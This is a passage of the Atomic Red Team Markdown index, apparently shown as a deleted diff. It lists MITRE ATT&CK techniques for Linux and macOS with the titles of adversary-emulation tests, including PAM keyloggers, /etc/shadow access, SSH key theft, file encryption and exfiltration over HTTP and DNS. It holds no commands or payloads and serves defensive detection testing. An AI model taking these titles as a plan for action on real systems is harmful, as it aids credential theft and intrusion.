- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md)
- Atomic Test #5: SUDO Brute Force - Debian [linux]
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- Atomic Test #2: Dump individual process memory with Python (Local) [linux]
- Atomic Test #3: Capture Passwords with MimiPenguin [linux]
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos]
- T1139 Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1145 Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #9: LaZagne.py - Dump Credentials from Firefox Browser [linux]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1649 Steal or Forge Authentication Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Find AWS credentials [macos, linux]
- Atomic Test #3: Extract passwords with grep [macos, linux]
- Atomic Test #6: Find and Access Github Credentials [macos, linux]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
- Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
- Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
- Atomic Test #6: Enumerate users and groups [linux, macos]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
- Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
- Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #2: Network Share Discovery - linux [linux]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #4: Linux VM Check via Hardware [linux]
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #24: Linux List Kernel Modules [linux]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
- Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
- Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
- Atomic Test #4: Examine password expiration policy - All Linux [linux]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #3: Discover System Language with locale [linux]
- Atomic Test #4: Discover System Language with localectl [linux]
- Atomic Test #5: Discover System Language by locale file [linux]
- Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- Atomic Test #6: Shutdown System via `halt` - Linux [linux]
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- Atomic Test #5: New script file in the tmp directory [linux]
- Atomic Test #6: What shell is running [linux]
- Atomic Test #7: What shells are available [linux]
- Atomic Test #8: Command line scripts [linux]
- Atomic Test #9: Obfuscated command line scripts [linux]
- Atomic Test #10: Change login shell [linux]
- Atomic Test #11: Environment variable scripts [linux]
- Atomic Test #12: Detecting pipe-to-shell [linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux]
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- Atomic Test #8: Python3 http.server [linux]
atomics/Indexes/Indexes-Markdown/macos-index.md
-746
View File
@@ -1,746 +0,0 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [macos, linux]
